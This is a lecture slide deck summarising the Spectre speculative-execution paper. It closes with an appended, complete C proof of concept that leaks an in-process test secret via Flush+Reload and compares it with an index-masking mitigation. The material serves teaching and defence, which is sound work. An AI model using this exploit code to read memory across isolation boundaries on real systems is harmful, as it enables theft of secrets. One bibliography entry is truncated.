# Spectre Attacks: Exploiting Speculative Execution

David Bimmler, May 2, 2019

Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, and Yuval Yarom. "Spectre Attacks: Exploiting Speculative Execution". In: 40th IEEE Symposium on Security and Privacy (S&P'19). 2019

#### Agenda

- Executive Summary
- Background
- Novelty
- Key Approach and Ideas
- Mechanisms (in some detail)
- Key Results: Methodology and Evaluation
- Summary
- Strengths
- Weaknesses
- Thoughts and Ideas
- Discussion

#### Executive Summary

- Spectre is a security vulnerability violating memory isolation
- It abuses speculative execution to execute instructions which should never be executed architecturally
- It uses side-channels to leak microarchitectural state changed by those erroneously executed instructions

# Background

#### Background: Architecture vs Microarchitecture

The *instruction set architecture* (ISA) is the contract between hardware and software. A microarchitecture (µarch) is an implementation of an ISA in a given processor. The ISA says nothing about caches, predictors or speculation; those are µarch details, and Spectre lives entirely in them.
#### Background: Direct and Indirect Branches

| direct branch | indirect branch |
|---------------|-----------------|
| JMP 0x89AB    | CALL EAX        |
| JNE 0x90AB    | JMP EAX         |
| many more     | RET             |

#### Background: Branch Prediction

- Superscalar processors predict branch outcomes
  - Direction of direct branches (taken/not taken)
    - cached by the Pattern History Table (PHT), indexed by the Branch History Buffer (BHB)
  - Target address of indirect branches
    - cached by the Branch Target Buffer (BTB)
    - Return Stack Buffer (RSB) for CALL/RET pairs

#### Background: Speculative Execution

- Predicted path is executed speculatively
- Processor keeps track of what is being executed speculatively
- Prediction incorrect: discard the architectural effects (registers, memory); µarch state such as cache contents is not rolled back
- Instructions executed due to misprediction are called transient instructions

#### Background: Microarchitectural State and Side-Channels

- µarch is stateful (e.g. PHT, BTB, RSB, caches, ...)
- State shared between processes
- Information leaks through that shared state are called side-channels
- Example: Flush+Reload<sup>1</sup>, a cache side-channel

<sup>1</sup>Yarom and Falkner, "FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack"

#### Flush+Reload: Attack

- Flush+Reload can monitor accesses to memory lines in shared pages
- Attacker flushes a line from the cache, waits, then reloads it and times the access
- Access to the monitored memory is fast if the victim has accessed it in the meantime

# Novelty

#### Spectre Attack

- Trick the victim into speculatively performing operations which would not occur during correct program execution
- Leak sensitive information through a microarchitectural side channel

# Key Approach and Ideas

#### Vulnerable Conditional Branches

The following code constitutes a Spectre gadget, vulnerable when `unsigned int x` is attacker controlled

```
if (x < array1_size)
    y = array2[array1[x] * 512];
```

#### Exploiting Conditional Branches

How is it vulnerable?

```
if (x < array1_size)
    y = array2[array1[x] * 512];
```

- Speculative execution if `array1_size` is not available (e.g. not cached): the branch is predicted instead of resolved
- Speculative out-of-bounds read of `array1` for a malicious `x`
- Encode the value read out of bounds into µarch state using a cache side-channel: the transient load of `array2[array1[x] * 512]` pulls exactly one of 256 probe lines into the cache

# Mechanisms (in some detail)

#### Conditional Branch Example

```
unsigned int array1_size = 16;
uint8_t array1[16] = {1, 2, ..., 15, 16};
uint8_t array2[256 * 512];
char *secret = "Squeamish Ossifrage";

void victim_function(size_t x) {
    if (x < array1_size) {
        y = array2[array1[x] * 512];
    }
}
```

#### Generic Spectre Attack

A generic Spectre attack consists of three phases

1. Setup
2. Transient Execution
3. Data Exfiltration

#### Spectre Attack: Setup Phase

Prepare the exfiltration side-channel: flush every probe line of `array2`

```
/* Flush array2[(0..255)*512] from cache */
for (i = 0; i < 256; i++)
    _mm_clflush(&array2[i * 512]);
```

Train the branch predictor to take the branch using valid values for `x`, and induce speculative execution by flushing `array1_size` so that the bounds check resolves slowly

```
for (j = 5; j >= 0; j--) {
    _mm_clflush(&array1_size);
    victim_function(training_x);
}
```

#### Spectre Attack: Transient Execution Phase

Executing the gadget with a malicious `x` results in a speculative out-of-bounds read

```
_mm_clflush(&array1_size);
victim_function(malicious_x);
```

#### Spectre Attack: Encoding Information

The result of the malicious read is encoded in the probe array: which line of `array2` becomes cached depends on the secret byte `array1[x]`

```
if (x < array1_size)
    y = array2[array1[x] * 512];
```

#### Spectre Attack

A generic Spectre attack consists of three phases

1. Setup
2. Transient Execution
3.
Data Exfiltration

#### Spectre Exfiltration: Flush+Reload

Exfiltrate using Flush+Reload: time a reload of every probe line; the one line the transient load cached is fast, and its index is the leaked byte

```
for (i = 0; i < 256; i++) {
    addr = &array2[i * 512];
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;   // compute access time
    if (time2 <= CACHE_HIT_THRESHOLD)
        printf("found: %#x\n", i);
}
```

#### Exploiting Indirect Branches

- Destination address of an indirect branch may be unknown when the branch is fetched
- Speculative execution continues at the predicted target address
- Attack: mistrain the branch target buffer from an attacker-controlled context
- Victim then speculatively executes a Spectre gadget with observable side effects

#### Mistraining Branch Predictors

- Attacker mimics the pattern of branches in its own context
- Attacker-chosen target is then predicted in the victim
- Highly µarch-specific reverse-engineering necessary

# Key Results: Methodology and Evaluation

#### Methodology

The paper presents multiple exploits:

1. Variant 1 proof of concept in native code
2. Variant 1 attacks in JavaScript and eBPF
3. Variant 2 proof of concept in native code
4. Variant 2 attack to leak host memory from within a KVM VM

#### Evaluation

- Spectre works
- Quite a few µarchs tested
  - Intel Ivy Bridge, Broadwell, Haswell, Skylake, Kaby Lake, AMD Ryzen, ...
- Bandwidth
- Error rate

| Exploit           | Bandwidth        | Error rate |
|-------------------|------------------|------------|
| native PoC var. 1 | ~10 kB/s         | < 0.01%    |
| JavaScript var. 1 | n/a              | n/a        |
| eBPF var. 1       | 2 kB/s to 5 kB/s | n/a        |
| native PoC var. 2 | 0.041 kB/s       | n/a        |
| KVM var. 2        | ~1.8 kB/s        | 1.7%       |

# Summary

- Transient instructions can violate security
  - in correct programs
- Through microarchitectural side-channels we can observe their effects
- Multiple variants exist to cause misprediction

# Strengths

- Gigantic impact
- Complete mitigation in software seemingly impossible<sup>2</sup>
- Generality of attack
- Many papers discussing the attack

<sup>2</sup>McIlroy, Sevcík, Tebbi, Titzer, and Verwaest, "Spectre is here to stay: An analysis of side-channels and speculative execution"

# Weaknesses

- µarch attack: finicky, brittle
- Local execution required
  - But: NetSpectre<sup>3</sup>

<sup>3</sup>Schwarz,
Schwarzl, Lipp, and Gruss, "NetSpectre: Read Arbitrary Memory over Network"

- Spotty evaluation
- Generality of attack not explained well enough

# Thoughts and Ideas

#### Performance versus Security

- Fundamental tradeoff: performance versus security
- Mitigations are stop gaps: the ISA might have to change

# Discussion

#### Discussion: Spectre Variations

```
if (x < array1_size) {
    y = array1[x];
    // do something using y that is observable
    // when speculatively executed
}
```

Can you think of more observable effects?

Thank You

#### Bibliography

- via Speculative Execution". In: CoRR abs/1802.09085 (2018). arXiv: 1802.09085. URL: http://arxiv.org/abs/1802.09085.
- Ge, Qian et al. "Time Protection: The Missing OS Abstraction". In: Proceedings of the Fourteenth EuroSys Conference 2019. EuroSys '19. Dresden, Germany: ACM, 2019, 1:1–1:17. ISBN: 978-1-4503-6281-8. DOI: 10.1145/3302424.3303976. URL: http://doi.acm.org/10.1145/3302424.3303976.
- Kiriansky, V. et al. "DAWG: A Defense Against Cache Timing Attacks in Speculative Execution Processors". In: 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). Oct. 2018, pp. 974–987. DOI: 10.1109/MICRO.2018.00083.
- Kocher, Paul et al. "Spectre Attacks: Exploiting Speculative Execution". In: 40th IEEE Symposium on Security and Privacy (S&P'19). 2019.
- Lipp, Moritz et al. "Meltdown: Reading Kernel Memory from User Space".
In: 27th USENIX Security Symposium (USENIX Security 18). 2018.
- McIlroy, Ross et al. "Spectre is here to stay: An analysis of side-channels and speculative execution". In: CoRR abs/1902.05178 (2019). arXiv: 1902.05178. URL: http://arxiv.org/abs/1902.05178.
- Schwarz, Michael et al. "NetSpectre: Read Arbitrary Memory over Network". In: CoRR abs/1807.10535 (2018). arXiv: 1807.10535. URL: http://arxiv.org/abs/1807.10535.
- Yarom, Yuval and Katrina Falkner. "FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack". In: 23rd USENIX Security Symposium (USENIX Security 14). San Diego, CA: USENIX Association, 2014, pp. 719–732. ISBN: 978-1-931971-15-7. URL: https://www.usenix.org/conference/usenixsecurity14/technical-sessions/presentation/yarom.

# Backup

#### Background: Virtual Memory

- memory isolation between different processes
- typically provided by hardware via the MMU
- page tables translate virtual to physical addresses

#### Disambiguation: Meltdown

Meltdown<sup>4</sup> is not Spectre

- also violates memory isolation
- exploits out-of-order execution: the value of a faulting load from kernel memory is forwarded to dependent transient instructions before the permission check takes effect
- privilege escalation: reads kernel memory from user space
- race condition specific to Intel processors
- mitigated by the KAISER patches (kernel page-table isolation), which unmap most of the kernel while user code runs

<sup>4</sup>Lipp, Schwarz, Gruss, Prescher, Haas, Fogh, Horn, Mangard, Kocher, Genkin, Yarom, and Hamburg, "Meltdown: Reading Kernel Memory from User Space".

#### Background: Out-of-Order Execution

- performance optimisation for pipelined processors
- instructions executed out of order
- but retired (i.e. become architecturally visible) in order
- complex data dependency logic in hardware

#### Flush+Reload: Background

- Identical memory pages are shared between processes
  - e.g.
for shared libraries
- Shared pages imply identical physical addresses
- L3 cache is physically tagged, so attacker and victim accesses to a shared page hit the same cache lines

#### Variant 2: Spectre Gadget

Attacker-controlled `ebx` and `edi` allow reading memory

```
adc edi, dword ptr [ebx+edx+13BE13BDh]
adc dl, byte ptr [edi]
```

- Set edi to the address of the probe array (e.g. in a shared library)
- Set ebx to m - 0x13BE13BD - edx, so the first instruction loads the dword at the target address m and adds it to edi
- The second instruction then dereferences edi, touching a probe-array line selected by the value read from m
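A complete, runnable version of the three phases from the Mechanisms section (setup, transient execution, exfiltration), with the index-masking mitigation raised under Performance versus Security placed beside the vulnerable gadget so the two can be compared on the same machine. This is an added example written for this page, not code from the slides or from the paper's artifact; it follows the structure of the paper's Appendix C proof of concept. Assumptions: x86-64 with gcc or clang, a cache-hit threshold of 80 cycles (tune per machine), the constructed string `Squeamish Ossifrage` standing in for a secret, and the generic mask arithmetic the Linux kernel uses for `array_index_nospec` on architectures without a `cmp`/`sbb` sequence. The names `victim_function_safe`, `pick_best` and `read_memory_byte` are chosen here.

```c
/* Added example, not from the slides: Spectre variant 1 PoC in the shape of
 * the paper's Appendix C, with an index-masking mitigation beside the gadget.
 * Assumes x86-64 + gcc/clang; CACHE_HIT_THRESHOLD is an assumed value.
 * Build: cc -O0 -o spectre spectre.c */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#define HAVE_X86 1
#else
#define HAVE_X86 0
#endif

#define CACHE_HIT_THRESHOLD 80   /* cycles; assumed, tune for the machine */

unsigned int array1_size = 16;
uint8_t array1[160] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t array2[256 * 512];       /* probe array: one cache line per byte value */
const char *secret = "Squeamish Ossifrage"; /* constructed in-process "secret" */
uint8_t temp = 0;                /* sink so the compiler keeps the load */

/* Vulnerable gadget from the slides: the bounds check is only architectural. */
void victim_function(size_t x) {
    if (x < array1_size)
        temp &= array2[array1[x] * 512];
}

/* Branchless clamp mask (generic form from the Linux kernel; x86 uses cmp/sbb):
 * all ones if idx < size, zero otherwise, valid for size <= SIZE_MAX/2. */
size_t array_index_mask_nospec(size_t idx, size_t size) {
    volatile size_t hidden = idx;   /* stop the compiler reusing the branch's result */
    idx = hidden;
    return (size_t)(~(intptr_t)(idx | (size - 1 - idx)) >> (sizeof(size_t) * 8 - 1));
}

/* Mitigated gadget: even a mispredicted branch cannot index out of bounds. */
void victim_function_safe(size_t x) {
    if (x < array1_size) {
        x &= array_index_mask_nospec(x, array1_size);
        temp &= array2[array1[x] * 512];
    }
}

/* Leader and runner-up among probe hit counts; 1 if the leader is clearly
 * ahead (the paper's stopping rule: best >= 2 * second + 5). */
int pick_best(const int results[256], uint8_t value[2], int score[2]) {
    int j = -1, k = -1;
    for (int i = 0; i < 256; i++) {
        if (j < 0 || results[i] >= results[j]) { k = j; j = i; }
        else if (k < 0 || results[i] >= results[k]) { k = i; }
    }
    value[0] = (uint8_t)j; score[0] = results[j];
    value[1] = (uint8_t)k; score[1] = results[k];
    return results[j] >= 2 * results[k] + 5 || (results[j] == 2 && results[k] == 0);
}

/* Leak the byte at target: 1 = confident, 0 = unsure, -1 = no x86 intrinsics. */
int read_memory_byte(const void *target, int use_safe, uint8_t value[2], int score[2]) {
#if HAVE_X86
    static int results[256];
    size_t malicious_x = (size_t)((uintptr_t)target - (uintptr_t)array1);
    unsigned int junk = 0;
    memset(results, 0, sizeof results);
    for (int tries = 999; tries > 0; tries--) {
        size_t training_x = tries % array1_size;
        for (int i = 0; i < 256; i++) _mm_clflush(&array2[i * 512]); /* setup */
        for (int j = 29; j >= 0; j--) {      /* 5 training calls, then 1 malicious */
            _mm_clflush(&array1_size);       /* bounds check now resolves slowly */
            for (volatile int z = 0; z < 100; z++) {}
            size_t x = ((j % 6) - 1) & ~0xFFFF;   /* all ones iff j % 6 == 0 */
            x = x | (x >> 16);
            x = training_x ^ (x & (malicious_x ^ training_x)); /* branchless select */
            if (use_safe) victim_function_safe(x); else victim_function(x);
        }
        for (int i = 0; i < 256; i++) {      /* exfiltration: Flush+Reload */
            int mix_i = ((i * 167) + 13) & 255;
            volatile uint8_t *addr = &array2[mix_i * 512];
            uint64_t t1 = __rdtscp(&junk);
            junk = *addr;
            uint64_t dt = __rdtscp(&junk) - t1;
            if (dt <= CACHE_HIT_THRESHOLD && mix_i != array1[training_x])
                results[mix_i]++;            /* ignore the line training touched */
        }
        if (pick_best(results, value, score)) return 1;
    }
    return 0;
#else
    (void)target; (void)use_safe; (void)value; (void)score;
    return -1;
#endif
}

int main(void) {
    uint8_t value[2]; int score[2];
    for (int safe = 0; safe < 2; safe++) {
        printf("%s gadget: ", safe ? "mitigated" : "vulnerable");
        for (size_t i = 0; i < strlen(secret); i++) {
            int r = read_memory_byte(secret + i, safe, value, score);
            if (r < 0) { puts("no x86 intrinsics in this build"); return 1; }
            putchar(r && value[0] > 31 && value[0] < 127 ? value[0] : '?');
        }
        putchar('\n');
    }
    return 0;
}
```

Build with `-O0`: optimisers may reorder or drop the gadget's load. On a core with speculation enabled the first line should spell out the secret and the second, read through `victim_function_safe`, should be all `?`, because the mask clamps `x` to index 0 whenever the architectural check fails, so the transient load can only touch a line that carries `array1[0]`. The mask is a per-gadget fix that has to be applied wherever such a pattern exists, which is the deck's point that software mitigation is a stop gap rather than a complete answer.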